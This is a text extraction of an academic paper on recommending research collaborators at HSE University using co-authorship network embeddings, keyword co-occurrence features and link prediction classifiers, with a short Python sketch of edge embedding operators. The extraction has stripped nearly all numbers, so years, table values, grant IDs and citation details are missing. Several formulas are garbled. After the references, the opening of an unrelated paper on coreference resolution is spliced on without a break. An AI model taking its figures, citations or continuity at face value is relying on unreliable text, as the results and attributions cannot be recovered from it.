we then stated the problem of indexing author research interests in terms of keywords attached to paper description in both databases, and retrieved from hse dataset using the bigartm (vorontsov et al., ) topic modeling framework. for the scopus dataset, we use automatically chosen keywords previously prepared by the service together with manually input by authors list of keywords. we also uses additional keywords written in terms of subject categories of journals and proceedings according to the indexing in scopus and wos research paper libraries. these two datasets (hse, scopus) have common papers; however hse dataset contains many noisy data and, unfortunately, low-level publications not indexed outside rsci, while scopus contains precise information on % number of papers and exact research makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interest representation while lacking weak connections on authors written only poor- quality papers. we visualized the hse network with author names as node labels shown in the fig. while visualizing edge width as the cumulative quantity of joint publications based on the figure visualization of hse co-authorship network. we plot the whole hse co-authorship network (a) and its subgraphs induced by local proximities around influential persons from our university such as rector kuzminov y.i. (b), first vice-rector responsible for science gokhberg l.m. (c), and university research supervisor yasin e.g. (d). full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ papers’ quartiles and their number. in particular, we plotted the whole network structure (fig. a) and zoomed parts corresponding dense communities with the most influential persons from our university such as rector kuzminov y.i. (fig. b), first vice-rector responsible for science gokhberg l.m. (fig. c), and university research supervisor yasin e.g. (fig. d). it is easy to see that rector co-authors are people responsible for core direction of university development and vice rectors realizing university strategy in research, education, government, expert, and company areas of collaboration. on the other hand, from dense subgraphs one can find exact matches of university staff departments, such as research institutes, such as institute for industrial and market studies headed by yakovlev a.a. or institute for statistical studies and economics of knowledge headed by l.m. gokhberg. we show that network could visualize the most important administrative staff units and their heads thus giving insight on the connection of publication activity and administrative structure of hse university. feature engineering our new idea was to obtain additional edge attributes that were embed based on keywords network as a part of model evaluation. we constructed the network of stemmed keywords co-occurrence. to construct this network, we used the principle that two nodes were connected if corresponding keywords occurred in the same paper. for a given list of keywords, we built standard node vec embedding (grover & leskovec, ). next, for each author the most frequent and relevant keyword was defined, and its embedding was used as node additional feature vector for our lp tasks. we considered the problem of finding authors with similar interests to a selected one as collaboration search problem. 
in terms of social network analysis, we studied the problem of recommending similar author as lp problem. we operate with authors similarity and use similarity scores described in liben-nowell & kleinberg ( ) as baseline for network descriptors for pairs of nodes presented in table . so, we represented each node by vector model of author attributes using manually engineered features such as hse staff information and publication activity represented by centralities of co-authorship network and descriptive statistics. we added graph embeddings for author research interests and node proximity and evaluated different combinations of models corresponding to node feature space representation. link embeddings to use node vec, we obtained the vector node representations. the node vec embedding parameters were chosen via roc–area under the curve (auc) optimization over embedding size with respect to different edge embedding operators. for edge embedding we applied specific component-wise functions representing edge to node embeddings for source and target nodes of a given edge. this model was suggested in grover & leskovec ( ), in which four functions for such edge embeddings were presented (see first four rows in table ). we leave an evaluation of the approaches from abu-el-haija, perozzi & al-rfou ( ), which use bi-linear form learning from reduced by deep neural makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network node embedding, for the future work while also working on a new model of joint node-edge graph embedding, similar to (goyal et al., ). presented in the paper model suggests simple generalization of the idea of pooling first-order neighborhood of nodes while constructing edge embedding operator, which is much faster than dimensionality reduction approaches. we evaluated our model on two additional functions involving not only edge source and target node representations, but also their neighborhood representations as average over all the nodes in first-order proximity. these measures were first presented in makarov et al. ( b) but were not properly evaluated. the resulting list of link embeddings is presented in table . for each author, we also chose the most frequent keyword in the co-occurrence network and then constructed general embedding using node vec with automatically chosen parameters. table similarity score for a pair of nodes u and v with local neighborhoods n(u) and n(v) correspondingly, and for vectors corresponding to two authors research interests x and y. similarity metric definition common neighbors jn(u) \ n(v)j jaccard coefficient jnðuÞ \ nðvÞj jnðuÞ [ nðvÞj adamic-adar score x w nðuÞ\nðvÞ ln jnðwÞj preferential attachment jn(u)j · jn(v)j graph distance length of shortest path between u and v metric score þ jjx � yjj cosine score ðx; yÞ jjxjjjjyjj pearson coefficient covðx; yÞffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi covðx; xÞ p � ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi covðy; yÞ p generalized jaccard p minðxi; yiÞp maxðxi; yiÞ table binary operators for computing vectorized (u, v)-edge representation based on node attribute embeddings f(x) for ith component for f(u, v). 
operator definitions (ith component of the edge representation):
average: (f_i(u) + f_i(v)) / 2
hadamard: f_i(u) · f_i(v)
weighted-l1: |f_i(u) − f_i(v)|
weighted-l2: (f_i(u) − f_i(v))²
neighbor weighted-l1: | Σ_{w ∈ N(u) ∪ {u}} f_i(w) / (|N(u)| + 1) − Σ_{t ∈ N(v) ∪ {v}} f_i(t) / (|N(v)| + 1) |
neighbor weighted-l2: ( Σ_{w ∈ N(u) ∪ {u}} f_i(w) / (|N(u)| + 1) − Σ_{t ∈ N(v) ∪ {v}} f_i(t) / (|N(v)| + 1) )²

the overall edge embedding contained several feature spaces described by the following list:
(1) edge embedding based on node2vec node embeddings
(2) edge embedding based on the node2vec embedding of the keywords co-occurrence network
(3) network similarity scores (baselines from liben-nowell & kleinberg ( )): common neighbors, jaccard's coefficient, adamic-adar score, preferential attachment, graph distance
(4) author similarity scores: cosine similarity, common neighbors, jaccard's generalized coefficient, pearson's correlation coefficient, metric score

training model
we consider machine learning models for the binary classification task of whether, for a given pair of nodes, there will be a link connecting them based on the previous or current co-authorship network. we compare logistic regression with lasso regularization, random forest, extreme gradient boosting (xgboost), and support vector machine (svm) models. we use the most common machine learning frameworks, which we briefly describe below. logistic lasso regression is a linear model with a logit target function; in addition, lasso regularization sets some coefficients to zero, effectively choosing a simpler model with fewer coefficients. random forest and gradient boosting are ensemble learning methods: the former operates by constructing a multitude of decision trees, while the latter combines several weak models in a stage-wise fashion and generalizes them by allowing optimization of an arbitrary differentiable loss function. random forest adds additional randomness to the model while growing the trees: instead of searching for the most important feature when splitting a node, it searches for the best feature among a random subset of features. svm constructs a hyperplane that has the largest distance to the nearest training-data point of any class, which yields good classification.

we use standard classification performance metrics for evaluating quality, such as precision, accuracy, f1-score (micro, macro), log-loss and roc–auc; next, we briefly define them. precision tells us what proportion of the publications that we predicted as existing actually existed. accuracy in classification problems is the number of correct predictions made by the model over all predictions made. recall tells us what proportion of the publications that actually existed was predicted by the algorithm as existing. to balance these metrics, the f1-score is calculated as a weighted mean of precision and recall. micro-averaged metrics are usually more useful if the class distribution is uneven, since they calculate metrics globally over true and false predictions; macro-averaged metrics are used when we want to evaluate system performance across different classes, calculating metrics for each label. log-loss, or logarithmic loss, is a "soft" measurement of accuracy that incorporates the idea of probabilistic confidence.
in binary classification, log-loss can be calculated as −(1/N) Σ_{i=1}^{N} ( y_i log(p_i) + (1 − y_i) log(1 − p_i) ), where y_i is a binary indicator of the correct class for observation i and p_i is the predicted probability of that class for observation i. log-loss measures the unpredictability of the "extra noise" that comes from using a predictor as opposed to the true labels. roc–auc, the area under the receiver operating characteristic curve, is equal to the probability that a classifier will rank a randomly chosen existing edge higher than a randomly chosen non-existing one. roc curves typically plot the rate of correctly predicted existing publications on the y axis and the rate of falsely predicted existing publications on the x axis; a larger auc is usually better. all metrics were averaged using fivefold cross-validation with five negative sampling trials for a fixed train set, which we describe below.

in our lp problem for the co-authorship network, we have two possible formalizations of predicting links: we consider either the temporal network structure, using information from previous years to predict links appearing in the current year, or the whole network, to predict missing links. for the first task, we use the combined hse+scopus dataset of publications and learn to predict papers appearing in a given year; we test our model by shifting the training period one year ahead and evaluating predictions for the target year based on publications up to the preceding year. for the second task, we remove a given percentage of existing edges while preserving the connectivity property of our dataset and add negative samples of the same size as the number of edges left, in order to balance the classes for the classification problem.

in the table below, for the future links prediction task, we compare the chosen predictive models while fixing the neighbor weighted-l link operator to construct the edge embeddings used as model features. it is interesting to see that the xgboost model gets significantly overfitted, while the best model appears to be the support vector machine. in this and the following tables we highlight the best values of the quality metrics in bold.

table: comparing machine learning models based on the neighbor weighted-l link embedding applied to future links prediction on the scopus dataset. columns: precision, accuracy, f1-score (macro), f1-score (micro), log-loss, roc–auc; rows: logistic regression, random forest, gradient boosting, svm.

in what follows, we aim to compare several link embedding metrics (see the operators table) for the best machine learning model. evaluating our approach on the first task on the scopus dataset, we can see in the corresponding table that the new link embedding suggested by the authors outperforms the existing approaches on all binary classification quality metrics. as for the second task, we evaluate the lp task over the hse and scopus datasets in terms of predictive models and link embeddings. in the corresponding tables, we can see that the svm model outperforms the other models on the hse dataset, but random forest gets the best auc on the scopus dataset, being competitive with the xgboost and svm models (svm performs slightly better). this could happen due to sparse data in scopus publications after removing a portion of the link information, and the lack of ensemble methods for choosing proper negative sampling for such a sparse dataset.
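a minimal sketch of the edge-embedding operators defined above and of the balanced evaluation loop used in these comparisons is given below. it assumes node embeddings are already available as a dictionary (for example from node2vec) and uses a plain scikit-learn logistic regression as the baseline classifier; it is an illustration, not the evaluation code behind the reported tables.

```python
# Turn node embeddings into edge vectors via the operators from the table
# above, then evaluate balanced link prediction with logistic regression.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score, log_loss, roc_auc_score


def neighborhood_mean(graph, node, emb):
    """Average embedding over the closed first-order neighborhood of a node."""
    nodes = list(graph.neighbors(node)) + [node]
    return np.mean([emb[n] for n in nodes], axis=0)


def edge_vector(graph, emb, u, v, operator):
    fu, fv = emb[u], emb[v]
    if operator == "average":
        return (fu + fv) / 2
    if operator == "hadamard":
        return fu * fv
    if operator == "weighted_l1":
        return np.abs(fu - fv)
    if operator == "weighted_l2":
        return (fu - fv) ** 2
    nu, nv = neighborhood_mean(graph, u, emb), neighborhood_mean(graph, v, emb)
    if operator == "neighbor_weighted_l1":
        return np.abs(nu - nv)
    if operator == "neighbor_weighted_l2":
        return (nu - nv) ** 2
    raise ValueError(operator)


def evaluate_operator(graph, emb, pos_edges, neg_edges, operator):
    """Balanced link prediction with a logistic-regression baseline."""
    pairs = list(pos_edges) + list(neg_edges)
    y = np.array([1] * len(pos_edges) + [0] * len(neg_edges))
    X = np.array([edge_vector(graph, emb, u, v, operator) for u, v in pairs])
    split = np.random.rand(len(y)) < 0.7          # random 70/30 train/test split
    clf = LogisticRegression(max_iter=1000).fit(X[split], y[split])
    proba = clf.predict_proba(X[~split])[:, 1]
    return {"accuracy": accuracy_score(y[~split], (proba > 0.5).astype(int)),
            "log_loss": log_loss(y[~split], proba),
            "roc_auc": roc_auc_score(y[~split], proba)}
```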
in the corresponding tables, we can see that the suggested local proximity operator for link embedding, which we call the neighbor weighted-l link embedding, outperforms all the other approaches for embedding edges based on node vector representations. to choose the best predictive model and edge embedding operator, we consider several feature space combinations based on the list above. the results of their comparison are shown in the tables below for the first and the second lp task (the original results appear in makarov et al. ( b)).

table: comparing link embeddings for future links prediction on the scopus dataset. columns: precision, accuracy, f1-score (macro), f1-score (micro), log-loss, roc–auc; rows: average, hadamard, weighted-l1, weighted-l2, neighbor weighted-l1, neighbor weighted-l2.

table: comparing machine learning models based on the neighbor weighted-l link embedding for the link prediction problem on the hse dataset. columns: precision, accuracy, f1-score (macro), f1-score (micro), log-loss, roc–auc; rows: logistic regression, random forest, gradient boosting, svm.

table: comparing machine learning models based on the neighbor weighted-l link embedding for the link prediction problem on the scopus dataset. columns and rows as in the previous table.

we can see that adding the embedding of author research interests, as well as the author embedding itself, plays a significant role in improving prediction quality for both tasks. when considering only structural embeddings or node similarity features, we obtained worse results in terms of all binary classification quality metrics. in both tasks, the combined approach with direct node similarity scores does not improve the quality of prediction, overfitting the model on particular properties and thus influencing the predictions for the network with missing links. makarov et al. ( a) evaluate their recommender system including research interests based only on subject categories from the respective journal index in scopus. this leads to worse lp results for authors with a small number of research publications, so they succeeded only in predicting so-called strong connections for authors writing at least three to five papers in co-authorship.

table: comparing link embeddings for the link prediction problem on the scopus dataset. columns: precision, accuracy, f1-score (macro), f1-score (micro), log-loss, roc–auc; rows: average, hadamard, weighted-l1, weighted-l2, neighbor weighted-l1, neighbor weighted-l2.

table: prediction of publications for a target year based on information from preceding years. columns: precision, accuracy, f1-score (macro), f1-score (micro), log-loss, roc–auc; rows: the feature space combinations from the list above.

table: comparing link embeddings for the link prediction problem on the hse dataset. columns: precision, accuracy, f1-score (macro), f1-score (micro), log-loss, roc–auc; rows: average, hadamard, weighted-l1, weighted-l2, neighbor weighted-l1, neighbor weighted-l2.

our approach
allows us to work with arbitrary research interest representations, thus making it possible to use the recommender system for novice researchers with few or no connections in the network.

experiments for a large network
to evaluate the scalability of our results, we considered the lp task for the large network called aminer (tang et al., ). this network describes collaborations among authors and contains over a million nodes and several million edges. for constructing node embeddings we used node2vec with fixed model parameters p and q, embedding dimension d, walk length per node l, and number of walks per node n. we decreased the values of l and n in comparison with the default values, because the process was terminated on our machine due to memory issues. we studied the impact of the train/test split on different edge embedding operators while fixing the logistic regression model for lp. we considered train sets consisting of increasing percentages of the graph edges, averaging the binary classification quality metrics over five negative samplings providing negative examples for non-existent edges. we compared the log-loss and accuracy metrics computed for train and test sets using different edge embeddings (see the figure referenced below). as a result, we found that the hadamard and neighbor weighted-l edge embedding operators give highly accurate results when trained on sparse data from the original graph. moreover, as the size of the train data increases (which is the case for our temporal co-authorship network), the hadamard product becomes inferior to our neighbor weighted-l operator. in addition, the neighbor weighted-l operator showed greater performance here than on the hse dataset. it was interesting to find out that the node2vec node embedding model overall produces very precise results for the lp task, although results may vary depending on the graph, as was shown in grover & leskovec ( ).

table: link prediction for a target year on the scopus dataset. columns: precision, accuracy, f1-score (macro), f1-score (micro), log-loss, roc–auc; rows: the feature space combinations from the list above.

discussion
we have found that the combined approach of embedding the co-authorship and keywords co-occurrence networks, while preserving several author attributes, leads to a significant improvement in the classification quality metrics for predicting future links and for the lp task. however, we will continue to experiment with the node2vec model. the first feature space from the list above (edge embedding based on node2vec node embeddings) is the node2vec model with a chosen dimension d (also compared on a larger dimension) and parameters p, q obtained by us via model fitting on a given d and a logistic regression baseline model. the small q value shows that considering local proximity was more important than proximities of higher orders. however, we aim to further study this question, taking into account modern methods of graph auto-encoders (kipf & welling, ).
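a rough sketch of how the embedding dimension and the p, q parameters could be selected against a logistic-regression baseline, as described above, is shown below. the score_embedding callable (for example, a roc–auc evaluation such as the one sketched earlier) and the grid values are assumptions for illustration.

```python
# Grid search over node2vec hyperparameters, scored by a user-supplied
# link-prediction evaluation (e.g. ROC-AUC with a fixed edge operator).
from itertools import product

from node2vec import Node2Vec  # assumed: the node2vec reference implementation


def fit_node2vec(graph, d, p, q, walk_length=20, num_walks=10):
    model = Node2Vec(graph, dimensions=d, p=p, q=q, walk_length=walk_length,
                     num_walks=num_walks, quiet=True).fit(window=5, min_count=1)
    return {node: model.wv[str(node)] for node in graph.nodes()}


def select_parameters(graph, pos_edges, neg_edges, score_embedding):
    """Return the (d, p, q) combination with the highest score."""
    grid = product([32, 64, 128], [0.5, 1.0, 2.0], [0.5, 1.0, 2.0])  # assumed grid
    scored = {}
    for d, p, q in grid:
        emb = fit_node2vec(graph, d, p, q)
        scored[(d, p, q)] = score_embedding(graph, emb, pos_edges, neg_edges)
    return max(scored, key=scored.get)
```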
we are also working on a new embedding model called jonnee, which learns high-quality node representations in tandem with edge representations. we found that the embeddings learned by jonnee are almost always superior to those learned by state-of-the-art models of all the different types (matrix factorization based, sequence-based and deep learning based), but the model has the drawback of longer training, similar to matrix factorizations yet less parallelizable, presenting a dilemma between the quality and the processing speed of the suggested solution for edge embedding construction.

figure caption: low log-loss and high accuracy (plotted with a log-scale y-axis) indicate the best edge embedding. we show that the neighbor weighted-l1 and neighbor weighted-l2 operators are on par with the state-of-the-art hadamard product presented in grover & leskovec ( ) and outperform it when the train data size increases, based on the log-loss (a and b) and accuracy (c and d) metrics computed for train and test sets.

while the lp task still remains a hard problem for network analysis, its application to matching collaborators based on structural, attribute and content information shows promising results on the applicability of a graph-based recommender system predicting links in the co-authorship network and incorporating author research interests in collaborative patterns. we aim to generalize the model based on full-text extraction of research interests from collections of source documents and to study deep learning solutions for representing a combined embedding of structural and content information for co-authorship networks. the code for computing all the models with respect to classification evaluation, choosing a proper edge embedding operator and tuning the hyper-parameters of node embeddings will be uploaded to github (http://github.com/makarovia/jcdl /), including the hse and scopus datasets.

conclusion
we have improved recommender systems (makarov, bulanov & zhukov, ; makarov et al., a) by choosing a proper link embedding operator (makarov et al., b) and including research interest information presented as an embedding of nodes in a keywords co-occurrence network connecting keywords relating to a given research article. we have compared several machine learning models for the future and missing lp problems, interpreted as a binary classification problem. the edge embedding operator suggested by makarov et al. ( b), called neighbor weighted-l (see the operators table), outperforms all the other edge embedding functions owing to involving the neighborhood of the edge in the graph, and was properly evaluated in this paper for both tasks. among the machine learning models, svm outperforms all the others except on the lp problem on the sparse scopus dataset, while xgboost was significantly overfitted; however, training svm for large graphs is computationally hard. the constructed model may be considered as a recommender system for searching for collaborators based on mutual research interests and publishing patterns. the recommender system demonstrates good results in predicting new collaborations between existing authors, even if they have little data in the co-authorship network, owing to the availability of their research interests.
we are looking forward to the evaluation of our system for universities, which have to deal with the problems of finding an expert based on a text to be evaluated, matchmaking for co-authored research papers with novice researchers, and searching for collaborators on a specific grant proposal or for suitable scientific advisers. focusing only on the machine learning task is not sufficient for a real-world application involving social interactions, so we aim to implement a framework with the possibility to manually add positive and negative preferences for collaboration recommendations, thus providing a useful service which could be integrated into the university business process of managing researchers' publication activity. our system may also be used for predicting the number of publications corresponding to a given administrative staff unit using network collaborative patterns, and thus for evaluating the efficiency of individual authors or whole staff units. it may also be used for suggesting collaborations between separate staff units by considering a combined network with staff units as vertices and connections between them weighted by the number of mutual publications. evaluating such a network for hse university gives us the picture that the most popular faculties of economics and management have many mutual connections due to the many researchers working at these faculties, but limiting these connections to scopus publications only leads to the influence of the computer science and engineering faculties, which reflects the trend of computer science research in applied sciences. we leave for future work the consideration of the applicability of our system for suggesting a new university publication strategy based on collaboration patterns, and we invite researchers to compare the existing solutions on the hse researchers' dataset.

acknowledgements
a part of the article is an extended and revised version of an oral talk presented at the international conference aist and posters at acm/ieee jcdl, websci and sunbelt. we thank all the colleagues from nru hse who participated in the discussion of this research.

additional information and declarations

funding
the work was supported by the russian science foundation under grant - - and performed at the national research university higher school of economics, russia. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: russian science foundation: - - . national research university higher school of economics, russia.

competing interests
the authors declare that they have no competing interests.

author contributions
ilya makarov conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
olga gerasimova performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, and approved the final draft.
pavel sulimov performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, and approved the final draft.
leonid e. zhukov conceived and designed the experiments, analyzed the data, performed the computation work, and approved the final draft.
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: github: https://github.com/makarovia/jcdl . references abu-el-haija s, perozzi b, al-rfou r. . learning edge representations via low-rank asymmetric projections. in: proceedings of the acm on conference on information and knowledge management. new york: acm, – . adafre sf, de rijke m. . discovering missing links in wikipedia. in: proceedings of the rd international workshop on link discovery, linkkdd ’ . new york: acm, – . backstrom l, leskovec j. . supervised random walks: predicting and recommending links in social networks. in: proceedings of the fourth acm international conference on web search and data mining, wsdm ’ . new york: acm, – . barabási a-l, pósfai m. . network science. cambridge: cambridge university press. belkin m, niyogi p. . laplacian eigenmaps and spectral techniques for embedding and clustering. advances in neural information processing systems. cambridge: mit press, – . cai h, zheng vw, chang k. . a comprehensive survey of graph embedding: problems, techniques and applications. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . cao s, lu w, xu q. . grarep: learning graph representations with global structural information. in: proceedings of the th acm international on conference on information and knowledge management, cikm ’ , new york: acm, – . carstens bt, jensen mr, spaniel mf, hermansen a. . vertex similarity in graphs using feature learning. available at https://projekter.aau.dk/projekter/files/ / mi f ___vertex_similarity.pdf (accessed june ). cetorelli n, peristiani s. . prestigious stock exchanges: a network analysis of international financial centers. journal of banking & finance ( ): – doi . /j.jbankfin. . . . chang s, han w, tang j, qi g-j, aggarwal cc, huang ts. . heterogeneous network embedding via deep architectures. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ , new york: acm, – . chen h, li x, huang z. . link prediction approach to collaborative filtering. in: proceedings of the th acm/ieee-cs joint conference on digital libraries (jcdl ’ ), new york, ny, usa, – . chen h, perozzi b, al-rfou r, skiena s. . a tutorial on network embeddings. arxiv preprint arxiv: . . cho h, yu y. . link prediction for interdisciplinary collaboration via co-authorship network. social network analysis and mining ( ): doi . /s - - - . cui p, wang x, pei j, zhu w. . a survey on network embedding. ieee transactions on knowledge and data engineering, pages. available at https://ieeexplore.ieee.org/abstract/ document/ . elsevier. . scopus. available at http://www.scopus.com/ (accessed january ). gao f, musial k, cooper c, tsoka s. . link prediction methods and their accuracy for different social networks and network metrics. scientific programming : – doi . / / . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/makarovia/jcdl http://dx.doi.org/ . /tkde. . https://projekter.aau.dk/projekter/files/ /mi f ___vertex_similarity.pdf https://projekter.aau.dk/projekter/files/ /mi f ___vertex_similarity.pdf http://dx.doi.org/ . /j.jbankfin. . . http://dx.doi.org/ . /s - - - https://ieeexplore.ieee.org/abstract/document/ https://ieeexplore.ieee.org/abstract/document/ http://www.scopus.com/ http://dx.doi.org/ . / / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gao s, denoyer l, gallinari p. . 
temporal link prediction by integrating content and structure information. in: proceedings of the th acm international conference on information and knowledge management, cikm ’ , new york: acm, – . goyal p, ferrara e. . graph embedding techniques, applications, and performance: a survey. knowledge-based systems : – doi . /j.knosys. . . . goyal p, hosseinmardi h, ferrara e, galstyan a. . capturing edge attributes via network embedding. arxiv preprint arxiv: . . grover a, leskovec j. . node vec: scalable feature learning for networks. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining, kdd ’ , new york: acm, – . hasan ma, zaki mj. . a survey of link prediction in social networks. boston: springer, – . he q, pei j, kifer d, mitra p, giles l. . context-aware citation recommendation. in: proceedings of the th international conference on world wide web, www ’ , new york: acm, – . huang x, li j, hu x. . label informed attributed network embedding. in: proceedings of the tenth acm international conference on web search and data mining, wsdm ’ , new york: acm, – . kipf tn, welling m. . variational graph auto-encoders. arxiv preprint arxiv: . . kong x, mao m, wang w, liu j, xu b. . voprec: vector representation learning of papers with text information and structural identity for recommendation. epub ahead of print april . ieee transactions on emerging topics in computing doi . /tetc. . . kossinets g, watts dj. . origins of homophily in an evolving social network. american journal of sociology ( ): – doi . / . le q, mikolov t. . distributed representations of sentences and documents. in: proceedings of the st international conference on machine learning (icml- ), cambridge: mit press, – . li x, chen h. . recommendation as link prediction: a graph kernel-based machine learning approach. in: proceedings of the th acm/ieee-cs joint conference on digital libraries, jcdl ’ . new york: acm, – . liang y, li q, qian t. . finding relevant papers based on citation relations. in: international conference on web-age information management, berlin: springer, – . liao l, he x, zhang h, chua t-s. . attributed social network embedding. arxiv preprint arxiv: . . liben-nowell d, kleinberg j. . the link-prediction problem for social networks. journal of the association for information science and technology ( ): – . liu y, kou z. . predicting who rated what in large-scale datasets. acm sigkdd explorations newsletter ( ): – doi . / . . lü l, zhou t. . link prediction in complex networks: a survey. physica a: statistical mechanics and its applications ( ): – . makarov i, bulanov o, gerasimova o, meshcheryakova n, karpov i, zhukov le. a. scientific matchmaker: collaborator recommender system. in: analysis of images, social networks and texts, cham: springer international publishing, – . makarov i, bulanov o, zhukov l. . co-author recommender system. in: springer proceedings in mathematics and statistic, berlin: springer, – . makarov i, gerasimova o, sulimov p, korovina k, zhukov l. a. joint node-edge network embedding for link prediction. in: springer proceedings in mathematics and statistic (to appear), berlin: springer, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /tetc. . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ makarov i, gerasimova o, sulimov p, zhukov l. b. 
co-authorship network embedding and recommending collaborators via network embedding. in: springer proceedings in mathematics and statistic (to appear), berlin: springer, – . makarov i, gerasimova o, sulimov p, zhukov le. b. recommending co-authorship via network embeddings and feature engineering: the case of national research university higher school of economics. in: proceedings of the th acm/ieee on joint conference on digital libraries. new york: acm, – . mcpherson m, smith-lovin l, cook jm. . birds of a feather: homophily in social networks. annual review of sociology ( ): – doi . /annurev.soc. . . . mikolov t, sutskever i, chen k, corrado gs, dean j. . distributed representations of words and phrases and their compositionality. in: advances in neural information processing systems, – . available at https://papers.nips.cc/paper/ -distributed-representations-of-words-and- phrases-and-their-compositionality.pdf. morel cm, serruya sj, penna go, guimarães r. . co-authorship network analysis: a powerful tool for strategic planning of research, development and capacity building programs on neglected diseases. plos neglected tropical diseases ( ):e doi . /journal.pntd. . national research university higher school of economics. . publications of hse. available at http://publications.hse.ru/en (accessed may ). newman mej. a. coauthorship networks and patterns of scientific collaboration. proceedings of the national academy of sciences of the united states of america (suppl ): – doi . /pnas. . newman me. b. who is the best connected scientist? a study of scientific coauthorship networks. complex networks : – . pan s, wu j, zhu x, zhang c, wang y. . tri-party deep network representation. network ( ): . perozzi b, al-rfou r, skiena s. . deepwalk: online learning of social representations. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ , new york: acm, – . robins g, snijders t, wang p, handcock m, pattison p. . recent developments in exponential random graph (p�) models for social networks. social networks ( ): – doi . /j.socnet. . . . roweis st, saul lk. . nonlinear dimensionality reduction by locally linear embedding. science ( ): – doi . /science. . . . scott j. . social network analysis. thousand oaks: sage. srinivas v, mitra p. . applications of link prediction. cham: springer international publishing, – . tang j, liu h. . unsupervised feature selection for linked social media data. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . tang j, qu m, wang m, zhang m, yan j, mei q. . line: large-scale information network embedding. in: proceedings of the th international conference on world wide web, www ‘ , republic and canton of geneva, switzerland: international world wide web conferences steering committee, – . tang j, zhang j, yao l, li j, zhang l, su z. . arnetminer: extraction and mining of academic social networks. in: kdd’ , new york, ny, usa, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /annurev.soc. . . https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf http://dx.doi.org/ . /journal.pntd. http://publications.hse.ru/en http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /science. . . http://dx.doi.org/ . 
tang l, liu h. . leveraging social media networks for classification. data mining and knowledge discovery ( ): – doi . /s - - -x.
tenenbaum jb, de silva v, langford jc. . a global geometric framework for nonlinear dimensionality reduction. science ( ): – doi . /science. . . .
velden t, lagoze c. . patterns of collaboration in co-authorship networks in chemistry: mesoscopic analysis and interpretation. in: th international conference on scientometrics and informetrics, rio de janeiro: issi society, – .
vorontsov k, frei o, apishev m, romov p, dudarenko m. . bigartm. v . . . available at https://doi.org/ . /zenodo. .
wang d, cui p, zhu w. . structural deep network embedding. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – .
wang p, xu b, wu y, zhou x. . link prediction in social networks: the state-of-the-art. science china information sciences ( ): – doi . /s - - -y.
wasserman s, faust k. . social network analysis: methods and applications. vol. . cambridge: cambridge university press.
wu h, lerman k. . network vector: distributed representations of networks with global context. arxiv preprint arxiv: . .
yan e, ding y. . applying centrality measures to impact analysis: a coauthorship network analysis. journal of the american society for information science and technology ( ): – doi . /asi. .
yan s, xu d, zhang b, zhang hj, yang q, lin s. . graph embedding and extensions: a general framework for dimensionality reduction. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . .
yang c, liu z, zhao d, sun m, chang ey. . network representation learning with rich text information. in: proceedings of the th international joint conference on artificial intelligence, palo alto, ca, usa, – .
latent structures for coreference resolution
sebastian martschat and michael strube
heidelberg institute for theoretical studies ggmbh, schloss-wolfsbrunnenweg , heidelberg, germany
(sebastian.martschat|michael.strube)@h-its.org

abstract
machine learning approaches to coreference resolution vary greatly in the modeling of the problem: while early approaches operated on the mention pair level, current research focuses on ranking architectures and antecedent trees. we propose a unified representation of different approaches to coreference resolution in terms of the structure they operate on. we represent several coreference resolution approaches proposed in the literature in our framework and evaluate their performance. finally, we conduct a systematic analysis of the output of these approaches, highlighting differences and similarities.

introduction
coreference resolution is the task of determining which mentions in a text are used to refer to the same real-world entity. the era of statistical natural language processing saw the shift from rule-based approaches (hobbs, ; lappin and leass, ) to increasingly sophisticated machine learning models. while early approaches cast the problem as binary classification of mention pairs (soon et al., ), recent approaches make use of complex structures to represent coreference relations (yu and joachims, ; fernandes et al., ). the aim of this paper is to devise a framework for coreference resolution that leads to a unified representation of different approaches to coreference resolution in terms of the structure they operate on. previous work in other areas of natural language processing such as parsing (klein and manning, ) and machine translation (lopez, ) has shown that providing unified representations of approaches to a problem deepens its understanding and can also lead to empirical improvements. by implementing popular approaches in this framework, we can highlight structural differences and similarities between them. furthermore, this establishes a setting to systematically analyze the contribution of the underlying structure to performance, while fixing parameters such as preprocessing and features. in particular, we analyze approaches to coreference resolution and point out that they mainly differ in the structures they operate on. we then note that these structures are not annotated in the training data (section ). motivated by this observation, we develop a machine learning framework for structured prediction with latent variables for coreference resolution (section ). we formalize the mention pair model (soon et al., ; ng and cardie, ), mention ranking architectures (denis and baldridge, ; chang et al., ) and antecedent trees (fernandes et al., ) in our 